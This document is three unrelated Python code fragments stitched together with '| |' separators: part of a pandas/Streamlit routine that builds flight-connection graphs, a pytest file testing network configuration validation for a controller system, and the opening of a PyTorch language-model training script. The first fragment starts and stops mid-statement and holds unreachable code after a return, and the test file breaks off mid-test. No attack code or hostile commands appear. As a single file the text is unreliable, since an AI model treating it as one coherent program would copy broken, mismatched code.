max_ix = choice_ix+1
# For each inbound flight, compute the corresponding outbound flights
dfs = {}
for which_ix in range(min_ix, max_ix):
nodes = []
try:
inbound = city_inbounds.iloc[which_ix].id_f
nodes.append(inbound)
# keep: id_f only ==> a node
fsu_inbound = fsu.set_index('id').loc[inbound]
except:
continue
inbound_arr_delay = fsu_inbound.ARR_DELAY_MINUTES
# if the arrival delay of the inbound is negative, the plane arrived early, and the
# passengers have time to connect
if keep_early_arr == False and inbound_arr_delay < 0:
continue
# just a collection of 'id_nf' ==> nodes
outbounds = findOutboundIds(id_list, inbound).to_frame()
outbounds['id_f'] = inbound
nodes.extend(outbounds['id_nf'].tolist()) # This is the list of nodes
edges = outbounds['id_nf'].to_frame('e2') # e2 is id_nf
edges['e1'] = inbound # e1 is id_f
edges['id'] = edges['e1'] + '_' + edges['e2']
# What is left to do is add the metadata to these lists
# Nodes: the data comes from FSU files
# Edges: the data comes from PAX files
# Create a unique id that combines inbound (feeder) and outbound flights
# This will allow me to merge two files with feeder/non-feeder columns
feeders_1 = feeders[feeders['id_f'] == inbound]
feeders_1['id_f_nf'] = feeders_1['id_f'] + '_' + feeders_1['id_nf']
# extract these outgoings from the FSU database
# if outbounds has ids not in fsu, this approach will not work
fsu_outbound = pd.merge(fsu, outbounds, how='inner', left_on='id', right_on='id_nf')
fsu_outbound['id_f_nf'] = fsu_outbound['id_f'] + '_' + fsu_outbound['id_nf']
fsu_pax = pd.merge(fsu_outbound, feeders_1, how='inner', left_on='id_f_nf', right_on='id_f_nf')
#fsu_outbound.to_csv("outbound_cityGraph.csv", index=0)
fsu_pax.drop_duplicates(inplace=True)
# Compute connection time (inbound.IN - outbound.sch_dep)
id_f = fsu_pax.id_f_x
id_nf = fsu_pax.id_nf_x
# Node metadata
dep_delay = (fsu_pax.OUT_DTMZ - fsu_pax.SCH_DEP_DTMZ) / 1e9 / 60
arr_delay = (fsu_pax.IN_DTMZ - fsu_pax.SCH_ARR_DTMZ) / 1e9 / 60 # outbound
od = fsu_pax.OD
node_nf_dict = {'id':id_nf, 'arr_delay':arr_delay, 'dep_delay':dep_delay, 'od':od}
d_nf = pd.DataFrame(node_nf_dict)
# Add feeder row
# Find inbound in FSU data
# fsu_inbound is a Series. Another way to access : fsu_inbound.loc['SCH_DEP_DTMZ',0]
dep_delay = (fsu_inbound.OUT_DTMZ - fsu_inbound.transpose().SCH_DEP_DTMZ) / 1e9 / 60
arr_delay = (fsu_inbound.IN_DTMZ - fsu_inbound.transpose().SCH_ARR_DTMZ) / 1e9 / 60 # outbound
od = fsu_inbound.OD
row_f = {'id':inbound, 'arr_delay':arr_delay, 'dep_delay':dep_delay, 'od':od}
d_nf.loc[-1] = row_f
# drop=True: do not keep the new index column created by default
node_df = d_nf.sort_index().reset_index(drop=True)
# The first node is the feeder
# All the other nodes are the outbounds
# Create Graph edges and metadata
id_f_nf = id_f + "_" + id_nf
#st.write("handleGraph, fsu_inbound= ", fsu_inbound)
#st.write("IN_DTMZ: ", fsu_inbound.IN_DTMZ)
#st.write("SCH_DEP_DTMZ: ", fsu_outbound.SCH_DEP_DTMZ)
# Not clear why transpose is no longer needed.
available = (fsu_outbound.SCH_DEP_DTMZ - fsu_inbound.IN_DTMZ) / 1e9 / 60
planned = (fsu_outbound.SCH_DEP_DTMZ - fsu_inbound.SCH_ARR_DTMZ) / 1e9 / 60
#st.write("available= ", available)
#available = (fsu_outbound.SCH_DEP_DTMZ - fsu_inbound.transpose().IN_DTMZ) / 1e9 / 60
#planned = (fsu_outbound.SCH_DEP_DTMZ - fsu_inbound.transpose().SCH_ARR_DTMZ) / 1e9 / 60
pax_id_nf = fsu_pax.id_nf_y
pax_id_f = fsu_pax.id_f_y
pax_avail = (fsu_pax.SCH_DEP_DTMZ - fsu_inbound.transpose().IN_DTMZ) / 1e9 / 60
pax_planned = (fsu_pax.SCH_DEP_DTMZ - fsu_inbound.transpose().SCH_ARR_DTMZ) / 1e9 / 60
dfx = pd.DataFrame([pax_id_f, pax_id_nf, pax_avail, pax_planned]).transpose()
fsux = fsu[fsu['id'] == '2019/10/01SJOPTY10:29459']
fsuy = fsu[fsu['id'] == '2019/10/01PTYTPA14:12393']
delta = planned - available # = IN - SCH_ARR
edge_nf_zip = zip(available, planned, delta)
id_f = fsu_pax['id_f_y']
id_nf = fsu_pax['id_nf_y']
id_f_nf = fsu_pax['id_f_nf']
#st.write("No ID, fsu_pax: ", fsu_pax.shape)
edge_df = pd.DataFrame()
edge_df = pd.concat([edge_df, id_f_nf, id_f, id_nf], axis=1)
#st.write("No ID, edge_df: ", edge_df.shape)
## Reorder the columns for clarity
edge_df['avail'] = available
edge_df['planned'] = planned
edge_df['delta'] = delta
edge_df['pax'] = fsu_pax.pax_nf
## EDGE correct. Now add metadata: avail, planned, delta
# Remove edges and nodes for flights with less available connection time than `delay`
# (I could either simplify the graph, or use brushing in the graph. Or both.)
# Let us do both. Simplification in this method, and brushing in Altair.
#st.write(node_df.columns)
#st.write(edge_df.columns)
# 1. find all nodes to remove
# The passengers that "could" miss their flights have less available time than needed.
# We keep the flights that potentially have the most impact on the network
ids_nf_to_keep = edge_df[edge_df['avail'] < delay]['id_nf_y']
#st.write("No ID, edge_df after filtering delays: ", edge_df.shape)
#st.write("ID, ids_nf_to_keep: ", ids_nf_to_keep)
#st.write("node_df: ", node_df)
#st.write("edge_df= ", edge_df)
#st.write("delay= ", delay)
#st.write("handleCitiesGraph, ids_nf_to_keep: ", ids_nf_to_keep) # # EMPTY. WHY?
#st.write("ids_nf_to_keep: ", ids_nf_to_keep)
# 2. delete nodes from node DataFrame
node_df = node_df.set_index('id').loc[ids_nf_to_keep,:].reset_index()
# Add back the first row that is the feeder (it stays)
#st.write("NoID, row_f= ", row_f)
node_df.loc[-1] = row_f
node_df = node_df.sort_index().reset_index(drop=True)
# 3. delete edges from edge DataFrame
edge_df = edge_df.set_index('id_nf_y').loc[ids_nf_to_keep,:].reset_index()
#st.write("NoID, node_df: ", node_df)
#st.write("NoID, edge_df: ", edge_df)
#st.write(node_df.shape, edge_df.shape)
# Only the first ix
return node_df, edge_df
continue
columns=['id','planned','avail','delta','arr_delay','dep_delay','sch_dep_tmz','od','pax']
df2 = pd.DataFrame(list(zipped), columns=columns).sort_values(by='od')
df2 = df2[df2['avail'] < delay]
if df2.shape[0] == 0:
df2_isempty = True
else:
df2_isempty = False
if df2_isempty == False:
dfs[which_ix] = df2
if is_print and df2_isempty == False:
st.write(df2)
#display(df2)
printed_header = True
return dfs
#---------------------------------------------------------
def handleCityGraphId(flight_id, keep_early_arr, only_keep_late_dep, id_list, fsu, bookings_f, feeders, is_print=True, delay=45, flight_id_level=0, debug=False):
"""
Given an inbound flight to PTY return the corresponding outbound flighs
Return a tuple of Dataframes with node and edges
Arguments
flight_id_level: level of flight_id in the graph network. The root has level zero. Children of flight_id have level 1, grandchildren of flight_id have level 2. Each leg of a flight increases the level by 1.
"""
#st.write("enter handleCityGraphId")
# I need to return two structures: nodes and edges.
# This pair of structures should be returned for each flight I am working with.
# Nodes are single IDs with arr and dep times, arr and dep delays.
# Edges are double IDs with PAX, rotation, and connection times.
#st.write("Enter handleCityGraph")
inbound = flight_id
node_df = pd.DataFrame()
edge_df = pd.DataFrame()
#city_inbounds = findCity(bookings_f, city)
"""
if choice_ix == 'all':
min_ix = 0
max_ix = city_inbounds.shape[0]
else:
min_ix = choice_ix
max_ix = choice_ix+1
"""
min_ix, max_ix = 0, 1 # single element in the loop, so single flight_id
# For each inbound flight, compute the corresponding outbound flights
for which_ix in range(min_ix, max_ix):
nodes = []
inbound = pd.DataFrame({'id':[inbound]}) # New, created from method argument
try:
nodes.append(inbound)
fsu_inbound = fsu[fsu['id'] == inbound['id'].values[0]]
except:
#st.write("except")
continue
inbound_arr_delay = fsu_inbound.ARR_DELAY_MINUTES.values[0]
# if the arrival delay of the inbound is negative, the plane arrived early, and the
# passengers have time to connect
#st.write("inbound_arr_delay= ", inbound_arr_delay) # DF
# Do not keep early arrivals
# If the inbound (into PTY) is early, ignore subsequent flights
if keep_early_arr == False and inbound_arr_delay < 0:
#st.write("continue")
## Must keep keep_early_arrivals to TRUE for now. 2021-06-07.
continue
# just a collection of 'id_nf' ==> nodes
inbound = inbound['id'].values[0] # Series convert to list using .values
outbounds = findOutboundIds(id_list, inbound).to_frame()
outbounds['id_f'] = inbound
nodes.extend(outbounds['id_nf'].tolist()) # This is the list of nodes
edges = outbounds['id_nf'].to_frame('e2') # e2 is id_nf
edges['e1'] = inbound # e1 is id_f
edges['id'] = edges['e1'] + '_' + edges['e2']
# What is left to do is add the metadata to these lists
# Nodes: the data comes from FSU files
# Edges: the data comes from PAX files
# Create a unique id that combines inbound (feeder) and outbound flights
# This will allow me to merge two files with feeder/non-feeder columns
feeders_1 | |
"""
Copyright (c) 2014-2019 Wind River Systems, Inc.
SPDX-License-Identifier: Apache-2.0
"""
from six.moves import configparser
import mock
import os
import pytest
import sys
import controllerconfig.common.exceptions as exceptions
from controllerconfig import validate
from controllerconfig import DEFAULT_CONFIG
sys.modules['fm_core'] = mock.Mock()
import controllerconfig.systemconfig as cr # noqa: E402
def _dump_config(config):
""" Prints contents of config object """
for section in config.sections():
print("[%s]" % section)
for (name, value) in config.items(section):
print("%s=%s" % (name, value))
def _test_system_config(filename):
""" Test import and generation of answerfile """
# Parse the system_config file
system_config = cr.parse_system_config(filename)
# Dump results for debugging
print("Parsed system_config:\n")
_dump_config(system_config)
# Validate the system config file
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
# Validate the system config file.
# Using onboard validation since the validator's reference version number
# is only set at build-time when validating offboard
validate(system_config, DEFAULT_CONFIG, None, False)
def test_system_config_simple():
""" Test import of simple system_config file """
# Create the path to the system_config file
systemfile = os.path.join(
os.getcwd(), "controllerconfig/tests/files/", "system_config.simple")
_test_system_config(systemfile)
def test_system_config_ipv6():
""" Test import of system_config file with ipv6 oam """
# Create the path to the system_config file
systemfile = os.path.join(
os.getcwd(), "controllerconfig/tests/files/", "system_config.ipv6")
_test_system_config(systemfile)
def test_system_config_lag_vlan():
""" Test import of system_config file with lag and vlan """
# Create the path to the system_config file
systemfile = os.path.join(
os.getcwd(), "controllerconfig/tests/files/", "system_config.lag.vlan")
_test_system_config(systemfile)
def test_system_config_security():
""" Test import of system_config file with security config """
# Create the path to the system_config file
systemfile = os.path.join(
os.getcwd(), "controllerconfig/tests/files/", "system_config.security")
_test_system_config(systemfile)
def test_system_config_ceph():
""" Test import of system_config file with ceph config """
# Create the path to the system_config file
systemfile = os.path.join(
os.getcwd(), "controllerconfig/tests/files/", "system_config.ceph")
_test_system_config(systemfile)
def test_system_config_simplex():
""" Test import of system_config file for AIO-simplex """
# Create the path to the system_config file
systemfile = os.path.join(
os.getcwd(), "controllerconfig/tests/files/", "system_config.simplex")
_test_system_config(systemfile)
def test_system_config_simplex_mgmt():
""" Test import of system_config file for AIO-simplex with management
configuration"""
# Create the path to the system_config file
systemfile = os.path.join(
os.getcwd(), "controllerconfig/tests/files/",
"system_config.simplex_mgmt")
_test_system_config(systemfile)
# Test MGMT_NETWORK parameters that are not allowed
system_config = cr.parse_system_config(systemfile)
system_config.set('MGMT_NETWORK', 'GATEWAY', '192.168.42.1')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
system_config = cr.parse_system_config(systemfile)
system_config.set('MGMT_NETWORK', 'LOGICAL_INTERFACE',
'LOGICAL_INTERFACE_1')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test overlap with OAM network
system_config = cr.parse_system_config(systemfile)
system_config.set('MGMT_NETWORK', 'CIDR', '10.10.10.0/24')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test IPv6 management CIDR (not supported)
system_config = cr.parse_system_config(systemfile)
system_config.set('MGMT_NETWORK', 'CIDR', 'FDfdf8:f53e:61e4::18/64')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test management CIDR that is too small
system_config = cr.parse_system_config(systemfile)
system_config.set('MGMT_NETWORK', 'CIDR', '192.168.42.0/29')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
def test_system_config_validation():
""" Test detection of various errors in system_config file """
# Create the path to the system_config files
simple_systemfile = os.path.join(
os.getcwd(), "controllerconfig/tests/files/", "system_config.simple")
ipv6_systemfile = os.path.join(
os.getcwd(), "controllerconfig/tests/files/", "system_config.ipv6")
lag_vlan_systemfile = os.path.join(
os.getcwd(), "controllerconfig/tests/files/", "system_config.lag.vlan")
ceph_systemfile = os.path.join(
os.getcwd(), "controllerconfig/tests/files/", "system_config.ceph")
static_addr_systemfile = os.path.join(
os.getcwd(), "controllerconfig/tests/files/",
"system_config.static_addr")
# Test floating outside of OAM_NETWORK CIDR
system_config = cr.parse_system_config(ipv6_systemfile)
system_config.set('OAM_NETWORK', 'IP_FLOATING_ADDRESS', 'fc00:db20:35b:7399::5')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test non-ipv6 unit address
system_config = cr.parse_system_config(ipv6_systemfile)
system_config.set('OAM_NETWORK', 'IP_UNIT_0_ADDRESS', '10.10.10.3')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test missing pxeboot network when using IPv6 management network
system_config = cr.parse_system_config(ipv6_systemfile)
system_config.remove_section('PXEBOOT_NETWORK')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test ridiculously sized management network
system_config = cr.parse_system_config(ipv6_systemfile)
system_config.set('MGMT_NETWORK', 'IP_START_ADDRESS', 'fc00:db20:35b:7399::5:0:0:0')
system_config.set('MGMT_NETWORK', 'IP_END_ADDRESS',
'fc00:db20:35b:7399::5:ffff:ffff:ffff')
system_config.remove_option('MGMT_NETWORK', 'IP_FLOATING_ADDRESS')
system_config.remove_option('MGMT_NETWORK', 'IP_UNIT_0_ADDRESS')
system_config.remove_option('MGMT_NETWORK', 'IP_UNIT_1_ADDRESS')
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
validate(system_config, DEFAULT_CONFIG, None, False)
# Test using start/end addresses
system_config = cr.parse_system_config(ipv6_systemfile)
system_config.set('OAM_NETWORK', 'IP_START_ADDRESS', 'abcd::2')
system_config.set('OAM_NETWORK', 'IP_END_ADDRESS', 'abcd::4')
system_config.remove_option('OAM_NETWORK', 'IP_FLOATING_ADDRESS')
system_config.remove_option('OAM_NETWORK', 'IP_UNIT_0_ADDRESS')
system_config.remove_option('OAM_NETWORK', 'IP_UNIT_1_ADDRESS')
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
validate(system_config, DEFAULT_CONFIG, None, False)
# Test detection of an invalid PXEBOOT_CIDR
system_config = cr.parse_system_config(lag_vlan_systemfile)
system_config.set('PXEBOOT_NETWORK', 'PXEBOOT_CIDR',
'192.168.1.4/24')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
system_config.set('PXEBOOT_NETWORK', 'PXEBOOT_CIDR',
'FD00::0000/64')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
system_config.set('PXEBOOT_NETWORK', 'PXEBOOT_CIDR',
'192.168.1.0/29')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
system_config.remove_option('PXEBOOT_NETWORK', 'PXEBOOT_CIDR')
with pytest.raises(configparser.NoOptionError):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(configparser.NoOptionError):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test overlap of MGMT_NETWORK CIDR
system_config = cr.parse_system_config(lag_vlan_systemfile)
system_config.set('MGMT_NETWORK', 'CIDR', '192.168.203.0/26')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test invalid MGMT_NETWORK LAG_MODE
system_config = cr.parse_system_config(lag_vlan_systemfile)
system_config.set('LOGICAL_INTERFACE_1', 'LAG_MODE', '2')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test MGMT_NETWORK VLAN not allowed
system_config = cr.parse_system_config(simple_systemfile)
system_config.set('MGMT_NETWORK', 'VLAN', '123')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test MGMT_NETWORK VLAN missing
system_config = cr.parse_system_config(lag_vlan_systemfile)
system_config.remove_option('MGMT_NETWORK', 'VLAN')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test MGMT_NETWORK start address specified without end address
system_config = cr.parse_system_config(simple_systemfile)
system_config.set('MGMT_NETWORK', 'IP_START_ADDRESS', '192.168.204.2')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test MGMT_NETWORK end address specified without start address
system_config = cr.parse_system_config(simple_systemfile)
system_config.set('MGMT_NETWORK', 'IP_END_ADDRESS', '192.168.204.200')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test MGMT_NETWORK start and end range does not have enough addresses
system_config = cr.parse_system_config(static_addr_systemfile)
system_config.set('MGMT_NETWORK', 'IP_START_ADDRESS', '192.168.204.2')
system_config.set('MGMT_NETWORK', 'IP_END_ADDRESS', '192.168.204.8')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test MGMT_NETWORK start address not in subnet
system_config = cr.parse_system_config(simple_systemfile)
system_config.set('MGMT_NETWORK', 'IP_START_ADDRESS', '192.168.200.2')
system_config.set('MGMT_NETWORK', 'IP_END_ADDRESS', '192.168.204.254')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test MGMT_NETWORK end address not in subnet
system_config = cr.parse_system_config(simple_systemfile)
system_config.set('MGMT_NETWORK', 'IP_START_ADDRESS', '192.168.204.2')
system_config.set('MGMT_NETWORK', 'IP_END_ADDRESS', '192.168.214.254')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test overlap of INFRA_NETWORK CIDR
system_config = cr.parse_system_config(lag_vlan_systemfile)
system_config.set('INFRA_NETWORK', 'CIDR', '192.168.203.0/26')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
system_config.set('INFRA_NETWORK', 'CIDR', '192.168.204.0/26')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test invalid INFRA_NETWORK LAG_MODE
system_config = cr.parse_system_config(lag_vlan_systemfile)
system_config.add_section('LOGICAL_INTERFACE_2')
system_config.set('LOGICAL_INTERFACE_2', 'LAG_INTERFACE', 'Y')
system_config.set('LOGICAL_INTERFACE_2', 'LAG_MODE', '3')
system_config.set('LOGICAL_INTERFACE_2', 'INTERFACE_MTU', '1500')
system_config.set('LOGICAL_INTERFACE_2', 'INTERFACE_PORTS', 'eth3,eth4')
system_config.set('INFRA_NETWORK', 'LOGICAL_INTERFACE',
'LOGICAL_INTERFACE_2')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test INFRA_NETWORK VLAN overlap
system_config = cr.parse_system_config(lag_vlan_systemfile)
system_config.set('INFRA_NETWORK', 'VLAN', '123')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test overlap of CLUSTER_NETWORK CIDR
system_config = cr.parse_system_config(lag_vlan_systemfile)
system_config.set('CLUSTER_NETWORK', 'CIDR', '192.168.203.0/26')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
system_config.set('CLUSTER_NETWORK', 'CIDR', '192.168.204.0/26')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test invalid CLUSTER_NETWORK LAG_MODE
system_config = cr.parse_system_config(lag_vlan_systemfile)
system_config.add_section('LOGICAL_INTERFACE_2')
system_config.set('LOGICAL_INTERFACE_2', 'LAG_INTERFACE', 'Y')
system_config.set('LOGICAL_INTERFACE_2', 'LAG_MODE', '3')
system_config.set('LOGICAL_INTERFACE_2', 'INTERFACE_MTU', '1500')
system_config.set('LOGICAL_INTERFACE_2', 'INTERFACE_PORTS', 'eth3,eth4')
system_config.set('CLUSTER_NETWORK', 'LOGICAL_INTERFACE',
'LOGICAL_INTERFACE_2')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test CLUSTER_NETWORK VLAN overlap
system_config = cr.parse_system_config(lag_vlan_systemfile)
system_config.set('CLUSTER_NETWORK', 'VLAN', '123')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test overlap of OAM_NETWORK CIDR
system_config = cr.parse_system_config(lag_vlan_systemfile)
system_config.set('OAM_NETWORK', 'CIDR', '192.168.203.0/26')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
system_config.set('OAM_NETWORK', 'CIDR', '192.168.204.0/26')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
system_config.set('OAM_NETWORK', 'CIDR', '192.168.205.0/26')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test invalid OAM_NETWORK LAG_MODE
system_config = cr.parse_system_config(lag_vlan_systemfile)
system_config.add_section('LOGICAL_INTERFACE_2')
system_config.set('LOGICAL_INTERFACE_2', 'LAG_INTERFACE', 'Y')
system_config.set('LOGICAL_INTERFACE_2', 'LAG_MODE', '3')
system_config.set('LOGICAL_INTERFACE_2', 'INTERFACE_MTU', '1500')
| |
<gh_stars>1-10
import argparse
import os
import time
import math
import random
import hashlib
import numpy
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim.lr_scheduler as lr_scheduler
import data
import model
from utils import rankloss, get_batch, repackage_hidden
from splitcross import SplitCrossEntropyLoss
parser = argparse.ArgumentParser(description='PyTorch PennTreeBank RNN/LSTM Language Model')
parser.add_argument('--data', type=str, default='data/syntactic_penn/',
help='location of the data corpus')
parser.add_argument('--model', type=str, default='LSTM',
help='type of recurrent net (LSTM, QRNN, GRU)')
parser.add_argument('--emsize', type=int, default=400,
help='size of word embeddings')
parser.add_argument('--nhid', type=int, default=1150,
help='number of hidden units per layer')
parser.add_argument('--chunk_size', type=int, default=10,
help='number of units per chunk')
parser.add_argument('--nlayers', type=int, default=3,
help='number of layers')
parser.add_argument('--lr', type=float, default=30,
help='initial learning rate')
parser.add_argument('--clip', type=float, default=0.25,
help='gradient clipping')
parser.add_argument('--epochs', type=int, default=1000,
help='upper epoch limit')
parser.add_argument('--batch_size', type=int, default=20, metavar='N',
help='batch size')
parser.add_argument('--bptt', type=int, default=70,
help='sequence length')
parser.add_argument('--dropout', type=float, default=0.45,
help='dropout applied to layers (0 = no dropout)')
parser.add_argument('--dropouth', type=float, default=0.3,
help='dropout for rnn layers (0 = no dropout)')
parser.add_argument('--dropouti', type=float, default=0.5,
help='dropout for input embedding layers (0 = no dropout)')
parser.add_argument('--dropoute', type=float, default=0.125,
help='dropout to remove words from embedding layer (0 = no dropout)')
parser.add_argument('--wdrop', type=float, default=0.45,
help='amount of weight dropout to apply to the RNN hidden to hidden matrix')
parser.add_argument('--seed', type=int, default=141,
help='random seed')
parser.add_argument('--nonmono', type=int, default=5,
help='random seed')
parser.add_argument('--cuda', action='store_false',
help='use CUDA')
parser.add_argument('--log-interval', type=int, default=500, metavar='N',
help='report interval')
# randomhash = ''.join(str(time.time()).split('.'))
# parser.add_argument('--save', type=str, default=randomhash + '.pt',
# help='path to save the final model')
parser.add_argument('--alpha', type=float, default=2,
help='alpha L2 regularization on RNN activation (alpha = 0 means no regularization)')
parser.add_argument('--beta', type=float, default=1,
help='beta slowness regularization applied on RNN activiation (beta = 0 means no regularization)')
parser.add_argument('--wdecay', type=float, default=1.2e-6,
help='weight decay applied to all weights')
# parser.add_argument('--resume', type=str, default='',
# help='path of model to resume')
parser.add_argument('--optimizer', type=str, default='sgd',choices=['sgd','adam'],
help='optimizer to use (sgd, adam)')
parser.add_argument('--when', nargs="+", type=int, default=[-1],
help='When (which epochs) to divide the learning rate by 10 - accepts multiple')
parser.add_argument('--finetuning', type=int, default=650,
help='When (which epochs) to switch to finetuning')
parser.add_argument('--philly', action='store_true',
help='Use philly cluster')
parser.add_argument('--device', type=int, default=0, help='select GPU')
parser.add_argument('--l4d',type=int,default=2,choices=[-1,0,1,2,],help='layer for distance')
parser.add_argument('--margin', type=float, default=1.0,
help='margin at rank loss')
parser.add_argument('--wds', type=str, default='middle',choices=['no','before','middle','after'],
help='different ways to use weighted distance signal')
parser.add_argument('--un', action='store_true',
help='unsupervised settings')
parser.add_argument('--sratio', type=float, default=1.0,
help='supervised signal ratio')
parser.add_argument('--dratio', type=float, default=1.0,
help='data size ratio')
parser.add_argument('--alpha1', type=float, default=1.0)
parser.add_argument('--alpha2', type=float, default=1.0)
args = parser.parse_args()
args.tied = True
args.batch_size_tune = args.batch_size_init = args.batch_size
if not os.path.isdir('params/'):
os.mkdir('params')
save_string = 'params/' + hashlib.md5(str(args).encode()).hexdigest() + '.pt'
print("Params saving to: " + save_string)
assert 0.0 <= args.margin and args.margin <= 1.0
assert 0.0 <= args.sratio and args.sratio <= 1.0
args.penn_only = False
if args.un:
args.penn_only = True
args.wds = "no"
# Set the random seed manually for reproducibility.
torch.manual_seed(args.seed)
random.seed(args.seed)
numpy.random.seed(args.seed)
if torch.cuda.is_available():
torch.cuda.set_device(args.device)
if not args.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
else:
torch.cuda.manual_seed(args.seed)
###############################################################################
